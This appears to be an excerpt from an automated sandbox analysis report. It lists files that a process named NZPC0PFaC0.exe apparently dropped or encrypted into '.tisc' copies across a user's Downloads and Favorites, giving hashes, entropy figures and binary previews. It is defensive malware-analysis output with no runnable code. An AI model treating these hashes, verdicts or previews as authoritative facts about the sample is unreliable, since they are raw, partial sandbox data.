                                                                                    Preview: e.f.Asi*.a.o.7t}..\^:...W..'2.\|'Q...Q^...W.yfo.z..7"..0....`4y+.%....t.h.f3.*.E...e.x.4#.....G......Z.5E...*,/....T>.A.......<..d.$.c..+z-.z..t.Y..fs'6D..................8r./..Y[..B...;....MpPW.Zq.3|./>...d.7.w.V.7.W.TS.:.@I......=.K3P]..Vh........W..7!cW..JJt.#.............W....z.........c.TS...L".s.\.../..Z.3.%W....R.A.<;.. ..7.n...#.....v..% .y3.\F..?.M....%=L.I.S{..>.......s3.+\]&H...(.X..x.G"Q...Sr..Z...........L..Y.B."u...?..i..3.4..P.....8x).....h....yE.......<.....d......e...{......4.4.....*...So..us.L....+?.$..@..FD....y...u'..\!.o. ....254`..~+Z.ZJ...g...#X...&.QAs..`v..,(.`.?.O.._Z...m..........Z3.6..z..% ..Q.?.)z.{$H.l~y...:M./x.w.".`...*...hl..+..qx.e..H%!....S..;.e%.~k.za..:F.j...2l?V.j.{.5.A.)j..a.,...%.I...._..N...}....y...Y...J.<...\l4..mT../.uj.9.`...:$b.\aK8.@CN|D+`....f.T@j.p..=OQ.O...-..vj....S....V....VlyF.H.L.(...W.e.sa."hSMf_..?.D.....S.Vv...!.....A,......n.....!@.^.}aA.f..6#v.$..<@.O.aY.`Yk-.....4....Wv... . {&`.t.
                                                                                    C:\Users\user\Downloads\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826692470719276
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:/nKzEJkp9bhGUFyJ8GEfJnIfW7MkNdFgLP18cOFHwuj1D1VmYtq/f7WcODf+rgbD:SzdGUFXG2JCW4syL1IfwbMDf++D
                                                                                    MD5:1A71ECA6163170F9152F61BDB18FC4B1
                                                                                    SHA1:A823706C5A2A8E590B98EE4E38D279EA219A917D
                                                                                    SHA-256:B3109132A3DE7B9AE7DBC14D6173B63D2EE1C28F32830053A6F3B4032239E3F0
                                                                                    SHA-512:B6B3DCAADE94B3A0133586D41DCFCC0DE545383B04A806BBA26AA5B58B3915C978B7562E47D622B3EE24BCA8F889D2AE15A1522F91CD1F46FC705FB38816A5A0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .,..T..H.9......l.Wo.~.=...r.c.../.yAF...Y.~.:-6.L....ro.....4H#...%..b.\*..........r~...m`..*.BF.&}".^.....cb64..\..w.*GZ....'......*.w.*..w..F}0.@.E...>]...^...f.o.m?.Uq.t.{..z.7.U.HE6.[..BI..QS.gA0.5...XI.....2........8S..I.u.."..Aiu.{{-..&......&.9...Y>.1.u)v{Dt..T..5..l>.|.{m...x...x.]....w......'...MM..L.f..u5.....h..Y......n}.o(..d....f......Lh.....#xC.C.".9.u..b.O.......}J'..-.g/...s..^...EK.<Yn.J...`......D.9m.......)j[#..vq}.....$)J.v..(...EQ...6.U......gvq1..^X=.FH..y4'.h.%|J.k@1L.....u....k...F.,.... .........H......I...'..o...X.Z..~:.Ut@....'...e..w.m....Q..C..$.V2..6..P.V.=......7P..<....hi......8...C%.....9..Z]u....`.W.0g.=....}b..T......A .....J*.W.J~N.NM.W.`..h;.J..8..#.......-.Yk....&.N...<vj...6.e..l..."=/^.1,7./.....{...Y@.Nx..2...n.A..ni..GF.8#...h9d.:.."..d.....a.).\U..x./.......J...W.\.rv.../pd...{....G.$z....I.3....^.l.u.../.%...A.P].Pjws...ur.........@...^.....Fmtu...?mK..31;.c....?.iU.<.n.z.:....}yz7]v....O..8=...
                                                                                    C:\Users\user\Downloads\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826692470719276
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:/nKzEJkp9bhGUFyJ8GEfJnIfW7MkNdFgLP18cOFHwuj1D1VmYtq/f7WcODf+rgbD:SzdGUFXG2JCW4syL1IfwbMDf++D
                                                                                    MD5:1A71ECA6163170F9152F61BDB18FC4B1
                                                                                    SHA1:A823706C5A2A8E590B98EE4E38D279EA219A917D
                                                                                    SHA-256:B3109132A3DE7B9AE7DBC14D6173B63D2EE1C28F32830053A6F3B4032239E3F0
                                                                                    SHA-512:B6B3DCAADE94B3A0133586D41DCFCC0DE545383B04A806BBA26AA5B58B3915C978B7562E47D622B3EE24BCA8F889D2AE15A1522F91CD1F46FC705FB38816A5A0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .,..T..H.9......l.Wo.~.=...r.c.../.yAF...Y.~.:-6.L....ro.....4H#...%..b.\*..........r~...m`..*.BF.&}".^.....cb64..\..w.*GZ....'......*.w.*..w..F}0.@.E...>]...^...f.o.m?.Uq.t.{..z.7.U.HE6.[..BI..QS.gA0.5...XI.....2........8S..I.u.."..Aiu.{{-..&......&.9...Y>.1.u)v{Dt..T..5..l>.|.{m...x...x.]....w......'...MM..L.f..u5.....h..Y......n}.o(..d....f......Lh.....#xC.C.".9.u..b.O.......}J'..-.g/...s..^...EK.<Yn.J...`......D.9m.......)j[#..vq}.....$)J.v..(...EQ...6.U......gvq1..^X=.FH..y4'.h.%|J.k@1L.....u....k...F.,.... .........H......I...'..o...X.Z..~:.Ut@....'...e..w.m....Q..C..$.V2..6..P.V.=......7P..<....hi......8...C%.....9..Z]u....`.W.0g.=....}b..T......A .....J*.W.J~N.NM.W.`..h;.J..8..#.......-.Yk....&.N...<vj...6.e..l..."=/^.1,7./.....{...Y@.Nx..2...n.A..ni..GF.8#...h9d.:.."..d.....a.).\U..x./.......J...W.\.rv.../pd...{....G.$z....I.3....^.l.u.../.%...A.P].Pjws...ur.........@...^.....Fmtu...?mK..31;.c....?.iU.<.n.z.:....}yz7]v....O..8=...
                                                                                    C:\Users\user\Downloads\QNCYCDFIJJ.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852146945353076
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:pzZht3JSMFSK3seR84dTLYQNe/P1wzw1nTIhb/RIBqrgaS62JBszz4llgbD:/hBJ9FZ31La/uM1nMBaBYOBSz42D
                                                                                    MD5:BA249DE0E160123286C07C85FEE86015
                                                                                    SHA1:724E4981C775ED4729D630154A182827E11B9AAE
                                                                                    SHA-256:5A121A289543DFC0CD3E7D8B4925E9FFC9D6807D60CF944B5D45962A981F2A32
                                                                                    SHA-512:826428C3459DA50E6E760D89F0DC24097196A0ED3A7604138A6FEE503234F8D1F5283C8D376003A1D6C45FD355E027CF55ECA9BEA631DA0FD2702B16961EDF71
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......'z/.b.5.^{r1..B....._.....A..X.T%.^bS.kg..g.QA.....N..I2.b4^.....>.k..;......X..9.z.1..3.s...r..uIR.-.............ht.........8..7|g...!c..$.'..[.Y>...[..K.. ..x.....&..hI[...2=.....B.]Ta....^...!..z.A..Au....CG....].Kr.c....LM.pF..2..3.A....dj........=....C..{lB...%...4..*.+..<.z.....6..h..K......&..C.0.o......9.h..,...h....W.X...gA.W.*91....u5......._u..~..5Y..a.l....N..}..V@rRR.EG...`..bT.....HD...}...W.J..Jn<.R...D.,..........9u2..S.3Jj.u....|............!G.%.=.....:..5.qb.~..s...T.......^QKU...`\..{->...r.Y.bp.A.|G...RW.........'i.................gR.l.c..5..o....}..Rh.u.....uJ'..f...z.VEL+...<.........d.%Oc.....4..\......[...x.......$.<..}.P.....la...]...G.l.TW..W...L.:...!.e.2..p..(.*.k..u...V....l.._l..H}...<p.y..?.@...yh..#..AQ......r...b.g....=.......=.e.Z..t...g..#.o....r...~..B.J..2[cW...0).4c@..L.......;.......t?.o..v.q..?q...9.......\G...w$...&.*.;,..x9O5~....A.f:K..c.w.,u..!.<@6..l.......;..(...?.rh....k
                                                                                    C:\Users\user\Downloads\QNCYCDFIJJ.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852146945353076
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:pzZht3JSMFSK3seR84dTLYQNe/P1wzw1nTIhb/RIBqrgaS62JBszz4llgbD:/hBJ9FZ31La/uM1nMBaBYOBSz42D
                                                                                    MD5:BA249DE0E160123286C07C85FEE86015
                                                                                    SHA1:724E4981C775ED4729D630154A182827E11B9AAE
                                                                                    SHA-256:5A121A289543DFC0CD3E7D8B4925E9FFC9D6807D60CF944B5D45962A981F2A32
                                                                                    SHA-512:826428C3459DA50E6E760D89F0DC24097196A0ED3A7604138A6FEE503234F8D1F5283C8D376003A1D6C45FD355E027CF55ECA9BEA631DA0FD2702B16961EDF71
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .......'z/.b.5.^{r1..B....._.....A..X.T%.^bS.kg..g.QA.....N..I2.b4^.....>.k..;......X..9.z.1..3.s...r..uIR.-.............ht.........8..7|g...!c..$.'..[.Y>...[..K.. ..x.....&..hI[...2=.....B.]Ta....^...!..z.A..Au....CG....].Kr.c....LM.pF..2..3.A....dj........=....C..{lB...%...4..*.+..<.z.....6..h..K......&..C.0.o......9.h..,...h....W.X...gA.W.*91....u5......._u..~..5Y..a.l....N..}..V@rRR.EG...`..bT.....HD...}...W.J..Jn<.R...D.,..........9u2..S.3Jj.u....|............!G.%.=.....:..5.qb.~..s...T.......^QKU...`\..{->...r.Y.bp.A.|G...RW.........'i.................gR.l.c..5..o....}..Rh.u.....uJ'..f...z.VEL+...<.........d.%Oc.....4..\......[...x.......$.<..}.P.....la...]...G.l.TW..W...L.:...!.e.2..p..(.*.k..u...V....l.._l..H}...<p.y..?.@...yh..#..AQ......r...b.g....=.......=.e.Z..t...g..#.o....r...~..B.J..2[cW...0).4c@..L.......;.......t?.o..v.q..?q...9.......\G...w$...&.*.;,..x9O5~....A.f:K..c.w.,u..!.<@6..l.......;..(...?.rh....k
                                                                                    C:\Users\user\Downloads\SUAVTZKNFL.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852571256514355
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ftmmMndcbhVU6pMV7MircCNAUEf8nazH+uHm4XXG9X+wmgFmwSFnpEioXXgbD:F5+dc/U6pIwiF2Ue8nOGI28Jfwando6D
                                                                                    MD5:44E5514BC040292C241E398DDD00ED92
                                                                                    SHA1:F0298FCB37AC56A0844662B6648AB2E903CA33AD
                                                                                    SHA-256:B666AE8057FB6AF444056038777A6CDE0F1874DDC6BAB321AF9370DAEB43242B
                                                                                    SHA-512:41DBB0030FAD99B6C0D3EDAE21A345260D375C3A59FA119B5856B01CB7058828561192930AC57F23E43BD61CA9F13C359BD3839C5563120D6F0CFF1D3235E44C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .o.%N...X0.........Ed..,.J....U.]g..u..&*.......Mc.2C.n...x..%^.d|....]?.5Pu...;l...#..t.......++}.b;..lU....?=~h.&...).....v..{.......W...q.!.o.+.t.0.U..?.NKs.A.6...-.x.{|.)q0........kJ+.E^~........J.M..(.M..~..w.<...?._..Y.".;.ja1j..,......9...G.9..Y.....$.W..9..1....M...W.RV..S ..V...5.....TY.o...}.8.lLP...a....Ju..Ab. Nm...B.K`[N.&..v...[5h..v......p?...|h.b.j.1.&..>^ w.<8T.y#...Y..%_...p....~..M.N..1.A.........4.)a..p.y..n.wr^Oq.).BZe./aS4.u I...pP.4d..(.q.).g.....pA..7-....>?IK..JGFmEa......bW...f..k.....vN0..M..\..ru.-...>....b.6...eq.#..=.X.?`....]'Vsm2i.cD.4...w....H.d. \.2^$D.V@.Q.g.....'..H.ZI.......+.....u.Vm#:.2!Xp..1.K....q..;.......C....6....6I.^.....'/..A/...../6.F..X.!......$2...\.2.-...c....l.h.X(.W.. f-.q....$7.%EP&f9o.=.).k~.!..l..iB..b..v.g..q.n...g..AH...Z...xy.e..`.:......,EP..7F...*...X..F....=].PqEX{|..T......;...#5#$..[CQ.$E....TN.g..z...\W<b.....A...q.E....u...)..w...-p..]...;.Y.[....4....K..\........l.<K..D(..Q......uh..Z
                                                                                    C:\Users\user\Downloads\SUAVTZKNFL.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.852571256514355
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ftmmMndcbhVU6pMV7MircCNAUEf8nazH+uHm4XXG9X+wmgFmwSFnpEioXXgbD:F5+dc/U6pIwiF2Ue8nOGI28Jfwando6D
                                                                                    MD5:44E5514BC040292C241E398DDD00ED92
                                                                                    SHA1:F0298FCB37AC56A0844662B6648AB2E903CA33AD
                                                                                    SHA-256:B666AE8057FB6AF444056038777A6CDE0F1874DDC6BAB321AF9370DAEB43242B
                                                                                    SHA-512:41DBB0030FAD99B6C0D3EDAE21A345260D375C3A59FA119B5856B01CB7058828561192930AC57F23E43BD61CA9F13C359BD3839C5563120D6F0CFF1D3235E44C
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .o.%N...X0.........Ed..,.J....U.]g..u..&*.......Mc.2C.n...x..%^.d|....]?.5Pu...;l...#..t.......++}.b;..lU....?=~h.&...).....v..{.......W...q.!.o.+.t.0.U..?.NKs.A.6...-.x.{|.)q0........kJ+.E^~........J.M..(.M..~..w.<...?._..Y.".;.ja1j..,......9...G.9..Y.....$.W..9..1....M...W.RV..S ..V...5.....TY.o...}.8.lLP...a....Ju..Ab. Nm...B.K`[N.&..v...[5h..v......p?...|h.b.j.1.&..>^ w.<8T.y#...Y..%_...p....~..M.N..1.A.........4.)a..p.y..n.wr^Oq.).BZe./aS4.u I...pP.4d..(.q.).g.....pA..7-....>?IK..JGFmEa......bW...f..k.....vN0..M..\..ru.-...>....b.6...eq.#..=.X.?`....]'Vsm2i.cD.4...w....H.d. \.2^$D.V@.Q.g.....'..H.ZI.......+.....u.Vm#:.2!Xp..1.K....q..;.......C....6....6I.^.....'/..A/...../6.F..X.!......$2...\.2.-...c....l.h.X(.W.. f-.q....$7.%EP&f9o.=.).k~.!..l..iB..b..v.g..q.n...g..AH...Z...xy.e..`.:......,EP..7F...*...X..F....=].PqEX{|..T......;...#5#$..[CQ.$E....TN.g..z...\W<b.....A...q.E....u...)..w...-p..]...;.Y.[....4....K..\........l.<K..D(..Q......uh..Z
                                                                                    C:\Users\user\Downloads\SUAVTZKNFL.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854940243644631
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:4f0Xb59p4SfcQ/KDmBZll34pMp1d9qTM/RqWYumSXT1pFhXsQERuY2Kvrt6qlL0J:4fLQcQ/maZaMd9qT6RrhDlN5Y8q9+D
                                                                                    MD5:46D89608E7547D62F7E26D4ACA38CA2E
                                                                                    SHA1:E758B931EE522B4916A9AA4C6C282B3566AFADDE
                                                                                    SHA-256:143BEE9BAFB5A02128774BFA0F6F0E4A174F26557F11E2B377A9873A51AC1B8A
                                                                                    SHA-512:4BB2A444FA4401DD2996861CF39FDB5F9F28E9886A5D919BE29614A001A45DF5C671DE36CC44E6416273E1870A734D08D452C639647604CE4CD9EEAE04A911A8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..z...V`.u.7..$p...vj.~l..<2B..8p..l..o....inF.: .%......{......^..............zt.[.v....`...>...3!L..g#......#.`>3.s.2.....>...[!..(.xl..2.L.4!...M..n5..1.L^Q8..M&.....L..B08.*.{.5...yD...d."..0.....N.....Wt.J./[....m..0...#...c....k.'.u....:4..jsy.0="Pp+-..m.......%...J.P\"e....[...S..}.V.........`..|s/.2o:60.ol...*..G....y.......2_3...L.. ....*....I..Q".....j.....W.....o.kE;B.q8..m...Y.tQ..-;.".n..}~...Rpg...X.v..l:.!2..E:.m;>...b.....!=...A........j.UP.X..h..U..zT........y....mK}.....*2^q:B+.h.....,..|._4....TO...0.a....1.Bd..O..."J.r............y...rZ.4..9.i...`_.....H......uN0...3..,x.Xg...4.Q3Mh.._...R...*r.......V.....o.G....1.B2....E9O..}...M.g...<.L$d.R.v...>...v....!.%...M........j...Ne|.,..%.3r..71........F..9.z.........3c..q`....l..... ....N...^...:.f...bDq...X.Q..x..-S1..pq..H.t<...r..Qj*.......$.|./^K^.R...6.u..#......y.|"\G.46.......$}.2f.a.Bs....-x.g........K.S.)..|...U{.&..5B.....x`....t.C.-.......TX.-...ZTJ....U..F....n
                                                                                    C:\Users\user\Downloads\SUAVTZKNFL.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854940243644631
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:4f0Xb59p4SfcQ/KDmBZll34pMp1d9qTM/RqWYumSXT1pFhXsQERuY2Kvrt6qlL0J:4fLQcQ/maZaMd9qT6RrhDlN5Y8q9+D
                                                                                    MD5:46D89608E7547D62F7E26D4ACA38CA2E
                                                                                    SHA1:E758B931EE522B4916A9AA4C6C282B3566AFADDE
                                                                                    SHA-256:143BEE9BAFB5A02128774BFA0F6F0E4A174F26557F11E2B377A9873A51AC1B8A
                                                                                    SHA-512:4BB2A444FA4401DD2996861CF39FDB5F9F28E9886A5D919BE29614A001A45DF5C671DE36CC44E6416273E1870A734D08D452C639647604CE4CD9EEAE04A911A8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..z...V`.u.7..$p...vj.~l..<2B..8p..l..o....inF.: .%......{......^..............zt.[.v....`...>...3!L..g#......#.`>3.s.2.....>...[!..(.xl..2.L.4!...M..n5..1.L^Q8..M&.....L..B08.*.{.5...yD...d."..0.....N.....Wt.J./[....m..0...#...c....k.'.u....:4..jsy.0="Pp+-..m.......%...J.P\"e....[...S..}.V.........`..|s/.2o:60.ol...*..G....y.......2_3...L.. ....*....I..Q".....j.....W.....o.kE;B.q8..m...Y.tQ..-;.".n..}~...Rpg...X.v..l:.!2..E:.m;>...b.....!=...A........j.UP.X..h..U..zT........y....mK}.....*2^q:B+.h.....,..|._4....TO...0.a....1.Bd..O..."J.r............y...rZ.4..9.i...`_.....H......uN0...3..,x.Xg...4.Q3Mh.._...R...*r.......V.....o.G....1.B2....E9O..}...M.g...<.L$d.R.v...>...v....!.%...M........j...Ne|.,..%.3r..71........F..9.z.........3c..q`....l..... ....N...^...:.f...bDq...X.Q..x..-S1..pq..H.t<...r..Qj*.......$.|./^K^.R...6.u..#......y.|"\G.46.......$}.2f.a.Bs....-x.g........K.S.)..|...U{.&..5B.....x`....t.C.-.......TX.-...ZTJ....U..F....n
                                                                                    C:\Users\user\Favorites\Amazon.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.421862882130854
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:O7tpBbAV8WOrNKwl4QjkN7YNiKPIcii9a:IO8dZKwl44COgbD
                                                                                    MD5:BEDD69DA7C0639D2ABD9287FBBE7E2DE
                                                                                    SHA1:C053C42B6C43852A0A4687245F564C47E47BF273
                                                                                    SHA-256:9BB53C2190E5B8A15304914DBB4C3541081C4F855234D55E4D6063FB398911AC
                                                                                    SHA-512:443B2C023A8B526FA49274E030ECEA69B2CF37D0FCB6A56DC90F16586E9FA14605D2A01DF399AB3C10BDA4058ECFB1A6A7242CC8C81620306C50C537E40463D9
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....Q`.x+.e.6....9.0.R....y.t.|...L....M3v.....0...O.....|X.&.....q..:Uhdl...n......:...j...C2.-.s........a.9 b.....|.b.U......#Ru.L..%.._E..._.....1.z....|.U..a.T...sY....u~.../...........F.W9..Su.6>.V.U{...[...g......=!..Z3.3.gEA...p@....:....I..8.]...g.%.?.........c.h....y..m......0.f..)......~T..f..c&9+.N/6M.%... .....j.U..k.6aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Amazon.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.421862882130854
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:O7tpBbAV8WOrNKwl4QjkN7YNiKPIcii9a:IO8dZKwl44COgbD
                                                                                    MD5:BEDD69DA7C0639D2ABD9287FBBE7E2DE
                                                                                    SHA1:C053C42B6C43852A0A4687245F564C47E47BF273
                                                                                    SHA-256:9BB53C2190E5B8A15304914DBB4C3541081C4F855234D55E4D6063FB398911AC
                                                                                    SHA-512:443B2C023A8B526FA49274E030ECEA69B2CF37D0FCB6A56DC90F16586E9FA14605D2A01DF399AB3C10BDA4058ECFB1A6A7242CC8C81620306C50C537E40463D9
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....Q`.x+.e.6....9.0.R....y.t.|...L....M3v.....0...O.....|X.&.....q..:Uhdl...n......:...j...C2.-.s........a.9 b.....|.b.U......#Ru.L..%.._E..._.....1.z....|.U..a.T...sY....u~.../...........F.W9..Su.6>.V.U{...[...g......=!..Z3.3.gEA...p@....:....I..8.]...g.%.?.........c.h....y..m......0.f..)......~T..f..c&9+.N/6M.%... .....j.U..k.6aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Bing.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):537
                                                                                    Entropy (8bit):7.546381260833125
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:o0IQ212xwJ72oDyx6yRcLAFgMloEpoDEo6AiORR0T5eS3KPIcii9a:/I50w1DyUCxFvNp/PXObY5v3KgbD
                                                                                    MD5:2C77DB97116BC726C7E68D3E48640DC8
                                                                                    SHA1:63E4298151DD16EB1C614E9C32EA9B8A76387F81
                                                                                    SHA-256:9AF3CD12C1A3FD1A98F1F4B34310FCB02CF76385BA23C47261A6BC67138088D4
                                                                                    SHA-512:507B6A3FDB68D77AD4B56C521614A680A7648A190C9A73FCD9B159907848D8C857280023CA16025D86366570AF01638A15DE81B01757C2A676857A1F30572912
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...L..-..CvO...&...A....i.....I...Bc..L.uT...O"xT...D.7S..K.R...1^F.S.A.2.V.....^..&.TU.,.t.fH.......[F.....\.ks.o..T..x............w.m.3.g.0.YH...s4...?..~.hXT.....e........K;i.....#..G..wK...m.Qr...........,.....\.(....%..8P....>..>#a.ulU....^..,..X..<.c!.....M.Q..Z#....c$GtVS..s2B...[P3....yu.........ySp..`.w:Q_.m...q,..S..1.......D~.......3\w.u"....UL..C...=..r...}...nFG..T..5z..X...a8..y..L...A....._@ .U..Q.=2.n.\j.mP..4.z..0..5.~aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Bing.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):537
                                                                                    Entropy (8bit):7.546381260833125
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:o0IQ212xwJ72oDyx6yRcLAFgMloEpoDEo6AiORR0T5eS3KPIcii9a:/I50w1DyUCxFvNp/PXObY5v3KgbD
                                                                                    MD5:2C77DB97116BC726C7E68D3E48640DC8
                                                                                    SHA1:63E4298151DD16EB1C614E9C32EA9B8A76387F81
                                                                                    SHA-256:9AF3CD12C1A3FD1A98F1F4B34310FCB02CF76385BA23C47261A6BC67138088D4
                                                                                    SHA-512:507B6A3FDB68D77AD4B56C521614A680A7648A190C9A73FCD9B159907848D8C857280023CA16025D86366570AF01638A15DE81B01757C2A676857A1F30572912
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...L..-..CvO...&...A....i.....I...Bc..L.uT...O"xT...D.7S..K.R...1^F.S.A.2.V.....^..&.TU.,.t.fH.......[F.....\.ks.o..T..x............w.m.3.g.0.YH...s4...?..~.hXT.....e........K;i.....#..G..wK...m.Qr...........,.....\.(....%..8P....>..>#a.ulU....^..,..X..<.c!.....M.Q..Z#....c$GtVS..s2B...[P3....yu.........ySp..`.w:Q_.m...q,..S..1.......D~.......3\w.u"....UL..C...=..r...}...nFG..T..5z..X...a8..y..L...A....._@ .U..Q.=2.n.\j.mP..4.z..0..5.~aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Facebook.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):442
                                                                                    Entropy (8bit):7.444300898197649
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:2H/7qcRxhW8sUBkho+RzWFcQxhoJ3sK+FdYVLpDlObjlffyDAUfAPJFNob9LDjHy:S/7vhHBkOv3aCfawbjNyDAjvGPIcii9a
                                                                                    MD5:9421DC8ECC86D81BCEDD3FF9A428263F
                                                                                    SHA1:DD46089CF69FBAFD49DE260B960780974124247E
                                                                                    SHA-256:6BC42B8B37C53FBF2DC3E7B291AD2CA9D867B6837AA8950148A8F33705326185
                                                                                    SHA-512:64F3D8FE1EEF3347A945D3AE3828BB424CB87F603E670B03B7C522449DE79885282BA35760120FCBCF4327366001B26D88F99100F81CF6F97A2473AF57B8D961
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: !.$m.Sn...".aK......\.(.=.spXO.......h....Lh.x,[.j..T.>l...c.........\:'9...j....Qa.....H6.;,.......Qi.3[.....s.$..`....T.[.W..C..9..2T.@.R.:.u....E?2.."\...6Xv..W{}.#..\.spX..c...K.%Vr..h.\2C...>.&P@...........7...K..K./..|.2.y0n.G.v3.P...rtW<.9..3k>&i...N.4...e...TI.:...&+.D...i.VP.b.vC.......p.)..b.....c..s..,.]....Y|_O6..K.[0..R...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Facebook.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):442
                                                                                    Entropy (8bit):7.444300898197649
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:2H/7qcRxhW8sUBkho+RzWFcQxhoJ3sK+FdYVLpDlObjlffyDAUfAPJFNob9LDjHy:S/7vhHBkOv3aCfawbjNyDAjvGPIcii9a
                                                                                    MD5:9421DC8ECC86D81BCEDD3FF9A428263F
                                                                                    SHA1:DD46089CF69FBAFD49DE260B960780974124247E
                                                                                    SHA-256:6BC42B8B37C53FBF2DC3E7B291AD2CA9D867B6837AA8950148A8F33705326185
                                                                                    SHA-512:64F3D8FE1EEF3347A945D3AE3828BB424CB87F603E670B03B7C522449DE79885282BA35760120FCBCF4327366001B26D88F99100F81CF6F97A2473AF57B8D961
                                                                                    Malicious:false
                                                                                    Reputation:unknown
